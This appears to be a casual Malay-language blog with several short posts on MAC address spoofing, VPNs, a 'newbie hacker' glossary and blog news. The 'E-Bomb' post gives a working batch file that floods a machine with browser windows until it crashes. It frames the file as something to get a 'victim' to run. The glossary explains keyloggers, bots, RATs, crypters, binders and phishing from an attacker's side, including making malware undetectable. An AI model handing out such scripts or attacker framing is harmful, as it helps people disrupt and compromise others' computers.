Menukar MAC address

05:10 ---

MAC (media Access Control) Alamat komputer anda

MAC juga boleh dikenali sebagai Address Hardware korang tuh.. setiap network card korang tu hanya ada 1 MAC address.. nombor ni xbole ditukar.. sbb mmg dilahirkan mcm tu oleh manufacturer dia melainkan korang tukar network card korang tuhh..

sekarang ni wak nk ajar korang cemana nk tukar mac address korang.. bukan secara kekal yer.. tapi sebelum belajar menukar MAC address korang, korang mesti paham cemana nk check MAC address korang tuh..

1. start > run > cmd > getmac 

maka akan muncul lah seperti gambar dibawah..

yang bertanda warna merah itu lah mac address korang.. atau kalo korang nk lebih real lg.. sila buka or robek2 laptop n tgok kt network card directly..

Cara-cara menukar MAC address:

1. software SMAC (untuk win7, xp, vista)

software SMAC ni xmenukar MAC address yang ada pada hardware.. ia hanya menukar pada "software based" ajee.. lebih kurang mcm sementara lah.. nnti korang reboot PC korang, dia akan tuka pada yang normal. SMAC

3. Install SMAC, run dan ikot langkah mcm pic dibawah..

1.masukan ape2 nombor/huruf pada "New Spoofed MAC Address" 
2. click pada "update MAC"

5. kemudian buka cmd > getmac

abis cite...  =)


sebenarnya ada byk lagi cara.. antaranya ialah.. 

Untuk linux plak, korang boleh wat mcm ni..
fconfig eth1 down
ifconfig eth1 hw ether 00:80:48:BA:d1:30
ifconfig eth1 up
ifconfig eth0 |grep HWaddr

ingat: 00:80:48:BA:d1:30 ialah MAC address yang baru..

hehehe.. kalo ada silap n salah sorry ye.. n kalo bahasa kurang difahami 
pun minta maap jgak. mls nk menaip.. ekekek

Selamat Mencubaa!

E-Bomb menjahanamkan PC Anda

00:12 ---

E-bomb ialah sejenis program untuk membuka "windows" secara banyak (melampau2) dan keupayaan e-bomb ni mampu membuatkan PC korang crash (heng). tapi program ini hanya akan running bila mangsa execute program tersebut..

cara cara membuat E-bomb

1. buka notepad. copy dan paste command dibawah:

@echo off
start iexplore.exe
start iexplore.exe
start iexplore.exe
start iexplore.exe
start iexplore.exe
start iexplore.exe
start iexplore.exe
start iexplore.exe
start iexplore.exe
start iexplore.exe
start iexplore.exe
start iexplore.exe
start iexplore.exe
start iexplore.exe
start iexplore.exe
start iexplore.exe
start iexplore.exe
start iexplore.exe
start iexplore.exe
start iexplore.exe
start iexplore.exe
start iexplore.exe
start iexplore.exe
start iexplore.exe
start iexplore.exe
start iexplore.exe
start iexplore.exe
start iexplore.exe
start iexplore.exe
start iexplore.exe
start iexplore.exe
start iexplore.exe

(korang boleh add lagi website tersebut.. kalau nk ebomb dibuka dgn google chrome, sila tukarkan iexplorer.exe  kepada chrome.exe) kepada Bomb.bat (pastikan korang save BAT extension)

3. kemudian digalakan korang click Bomb.bat itu tadi..

tips: makin banyak url makin bagus...

Tutorial ini hanya untuk info pembelajaran sajaha.. wak n dragonforce tidak bertanggung jawab atas penyalahgunaan E-bomb ini..

Terms2 untuk newbie hacker

23:32 ---

disini wak ade copy terms2 kepada sesiapa yang baru berjinak2 dalam bidang hacking.. ni pun wak copy paste.. hehehe.. layann

Keylogger - A keylogger is a program, usualy ran secretly in the background that records what users type, then the typed output is usually sent via email or uploaded by the keylogger somewhere to the web in secret. These can be attached to other executables so you never even know you ran them in the first place, once you click it once it often is started at startup from their on.

Bot - A bot is a program that is ran secretly in the background of a victim's computer. The bot connects to an IRC channel usually where a Bot Herder(its creator) can use a number of commands to control these computers that are now it's under control. A zombie computer(a pc under control of a bot herder) can be manipulated in a number of ways. Some functions of a bot include stealing victims passwords, keylogging, ddosing a server to cause it to crash, turning on the webcam and being able to watch the zombie computer's users, visiting a website(to gain money + traffic for a bot herder), clicking ads, making ads appear randomly, destroying itself(the pc), and sending spam to email contacts.

Botnet - A bunch of bot's connected to a server (usually IRC or web) that can be controlled and manipulated by its owner.

RAT (Remote Administration Tool) - Sort of like a botnet in regards that you can gain acess to the victims computer and do stuff like look at their files, webcam, etc. Only this malware connects back to you, apposed to a server.

Crypter - A crypter is used to make well known hacker's viruses (such as keyloggers and botnets) undetectable by anti-virus software by changing the virus program signatures that anti virus programs have in their databases to make them easier to spread.

Binder - A binder is used to bind a virus(such as a keylogger,etc) to another program making it undetechtable and able to fool users into thinking its something else. (IE a victim will click an installPhotoshop.exe and it will install photoshop as well as your virus secretly.)

FUD - Term for fully undetectable virus. (made by either coding your own virus or by crypting and binding an existing virus) Use (uncheck distribute sample) to check if your virus is undetectable.

Database - Used by most websites to store things such as User names, Passwords, Email, etc of an entire website or community.

SQL Injection - A way of manipulating a website's forms as a way of retrieving it's databases. This can be used to find users and passwords as well as obtaining admin on a website in order to deface it.

XSS (Cross Site Scripting) - a type of computer security vulnerability typically found in web applications which allow code injection by malicious web users into the web pages viewed by other users. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy. Vulnerabilities of this kind have been exploited to craft powerful phishing attacks and browser exploits. (From Wikipedia)

Cookie Stealing/Spoofing - Used to fool a victim into clicking a link that will steal their cookies to websites which you can then use to have their privileges to various parts of a website or forum.

BruteForcer - Program used to crack passwords by trying every password/password list on various forms.

Hashes - How passwords are usually stored, this is a way of crypting a password so it is not plain text, harder passwords are very hard to crack but simple ones have often been cracked and can be found on online databases. Some common password hashes include MD5 and SHA.

Social Engineering - Tricking a victim into doing something you want them to do by disguising or enticing them into doing what you want.

Phishing - Creating a fake login page to a well known website (IE Facebook) and then fooling a victim into entering their information on the fake login page through social engineering.

huhuhu.. wak harap posting kali ni dapat membantu korang ye..

HoHoHo... Pisang Panass~

18:10 ---

Assalamualaikum semua.. syukur alhamdulillah.. 24jam blog wak beroperasi.. sambutan mmg mengalakan.. mcm pisang panas la plak.. di bawah ni wak sertakan traffic2 blog wak untuk tatapan semua.. hehehhe.. jom kita tgok statistic traffic blog wak..

apa itu VPN???

16:25 ---


VPN bermaksud Virtual Private Network adalah sejenis WAN ( Wide Area Netetwork).. kebanyakan yang guna VPN ni selalunya syarikat. untuk user biasa, kita juga boleh menggunakan free VPN untuk acess website yang di block oleh ISP atau SKMM yang biasanya sebelum ini kebanyakan user hanya menukar DNS.

untuk maklumat lanjut menegai VPN, korang boleh la google pasal VPN ok.. sekarang ni wak akan ajar cemana nk setup VPN ke dalam WinXP.

Menyimpan maklumat rahsia didalam gambar

05:03 ---


ok.. kali ni wak akan tunjukan cemana nk menyimpan data penting korang didalam gambar.. caranya amat mudah dan senang aje.

bahan-bahan yang diperlukan ialan:
1) WinRAR

2) WinZIP

OMG! really?

03:22 ---


Assalamualaikum.. hohohoh.. macam tak percaya wak ketari akan buat blog.. hmm.. dari tadi dok edit2 templates ni.. baru jadi.. wheww.. 

ok ok ok.. tujuan blog ini dibuat hanya saja2. mungkin wak akan share apa yang wak tau pasal basic2 IT.. wak harap korang sume follow blog ni oke.. insya'allah wak akan update dlam masa terdekat.. yeahhh.. see yahh~
